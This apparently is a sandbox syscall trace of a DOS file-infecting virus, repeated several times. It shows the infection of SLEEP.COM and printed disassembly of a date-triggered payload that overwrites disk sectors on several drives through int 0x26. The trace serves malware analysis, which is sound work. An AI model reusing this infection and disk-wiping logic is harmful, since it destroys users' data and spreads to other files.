2018-12-25T12:43:37.512331734Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.515633122Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.527138897Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.534895546Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.538663704Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.540391612Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.543646276Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.553907271Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.556797003Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.566261873Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.577433387Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.581691839Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.589041178Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.597418655Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.600675763Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.612571471Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.62469981Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.628755853Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.630356952Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.633307399Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.64315147Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.645009876Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.653893438Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.66515005Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.668521194Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.675867197Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.683031922Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.686338678Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.689877452Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:37.694619345Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:37.698239326Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:37.700346912Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:37.145957448Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:37.148062048Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:37.151309367Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:37.157907588Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:37.165566858Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:37.171556753Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:37.176046497Z 62 PC: 12b20 | Close file
2018-12-25T12:43:37.17734965Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:37.197561698Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.211257555Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:37.218938042Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:37.222030477Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:37.225680839Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:37.235939112Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:37.23892923Z 62 PC: 12c29 | Close file
2018-12-25T12:43:37.247518455Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.261022951Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.264778693Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.273592945Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.281086119Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.283162025Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.295131534Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.302559514Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.305979921Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.308557052Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.311903659Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.322289361Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.324931593Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.333946925Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.344589963Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.347986434Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.355640958Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.362998822Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.365729257Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.376878398Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.384327587Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.388076099Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.390225914Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.393219971Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.404051873Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.407056854Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.41631115Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.428447753Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.432336574Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.43997255Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.447217692Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.450367698Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.462882315Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.471342178Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.475677849Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.478171521Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.481195704Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.491950109Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.49391272Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.502636356Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.514697738Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.518051654Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.52581338Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.534594826Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.537081753Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.542365914Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.547761261Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.552318966Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.554286001Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.557904964Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.580633348Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.582959971Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.58544001Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.591728049Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.594911998Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.603398143Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.611357991Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.613874189Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.625172254Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.633414022Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.63726305Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.639098645Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.642557995Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.652923241Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.654912924Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.663573188Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.675576514Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.678830004Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.686473971Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.694972613Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.697397066Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.715043835Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.724065953Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:37.729093907Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:37.731285871Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:37.735579188Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:37.746165536Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:37.748350814Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:37.757812279Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:37.770505114Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.773933096Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:37.781731406Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:37.790300547Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:37.79237547Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:37.796000718Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:37.801374387Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:37.803640025Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:37.805475843Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:38.188124001Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:38.189555823Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:38.191803558Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:38.196378016Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:38.205455015Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:38.212394108Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:38.218571185Z 62 PC: 12b20 | Close file
2018-12-25T12:43:38.220842196Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:38.234022049Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.238106537Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:38.240473942Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:38.241694656Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:38.243429175Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:38.249146506Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:38.25070114Z 62 PC: 12c29 | Close file
2018-12-25T12:43:38.257876285Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.2673163Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.270037547Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.276472466Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.282655998Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.285074682Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.298068323Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.304530671Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.311317683Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.312494737Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.314855415Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.323279339Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.324659614Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.332043377Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.342210013Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.344833318Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.352232009Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.35969704Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.361603609Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.371455813Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.379366195Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.382161094Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.383575613Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.387207365Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.395951406Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.397377565Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.404996439Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.414805839Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.417297137Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.428753043Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.435717063Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.437350629Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.446838752Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.453661406Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.456173218Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.457372152Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.460667731Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.468793343Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.470086366Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.477882137Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.487743761Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.490259543Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.496754113Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.502709841Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.504225857Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.508946485Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.513399637Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.516196814Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.518070218Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.520676713Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.536997724Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.538814632Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.540521318Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.5446562Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.54860209Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.555120693Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.561174261Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.56368991Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.573282099Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.579581745Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.5826108Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.583850601Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.586249377Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.596652856Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.598011218Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.605427446Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.61590663Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.618351011Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.637052085Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.649233914Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.651514468Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.661385687Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.668487655Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.672088606Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.67336044Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.67648226Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.684703197Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.68627154Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.694057725Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.703619905Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.706131104Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.713066444Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.719196307Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.720833839Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.723686669Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:38.727949406Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:38.730379994Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:38.732865802Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:38.667441772Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:38.674942057Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:38.677904046Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:38.684360844Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:38.690432225Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:38.69673615Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:38.702859207Z 62 PC: 12b20 | Close file
2018-12-25T12:43:38.705128144Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:38.717428198Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.724096782Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:38.727793552Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:38.729636032Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:38.732008524Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:38.743966904Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:38.745988703Z 62 PC: 12c29 | Close file
2018-12-25T12:43:38.753715166Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.770168594Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.774368525Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.780738545Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.786957777Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.78960724Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.802817655Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.809379877Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.812969852Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.820457778Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.828383305Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.838126247Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.839797784Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.847597755Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.862185517Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.864732459Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.870990509Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.877418615Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.879668916Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.88965186Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.901531722Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.909012058Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.910679162Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.913496023Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.923460676Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.925244351Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.932161642Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.941256182Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.944520834Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.950726022Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.958502518Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.960447866Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.970796909Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.977738766Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.980358411Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.98165641Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.984508664Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.992722453Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.994115777Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.002072308Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.01190012Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.014461813Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.021687806Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.028260108Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.029923173Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.034559812Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.039509586Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.042178323Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.044411451Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.047514695Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.06404311Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.065529897Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.067216897Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.071364148Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.074080251Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.081110504Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.090807978Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.093247993Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.103032838Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.109211414Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.111758521Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.113622419Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.116086798Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.124889443Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.126815786Z 62 PC: 12c29 | Close file (See above)
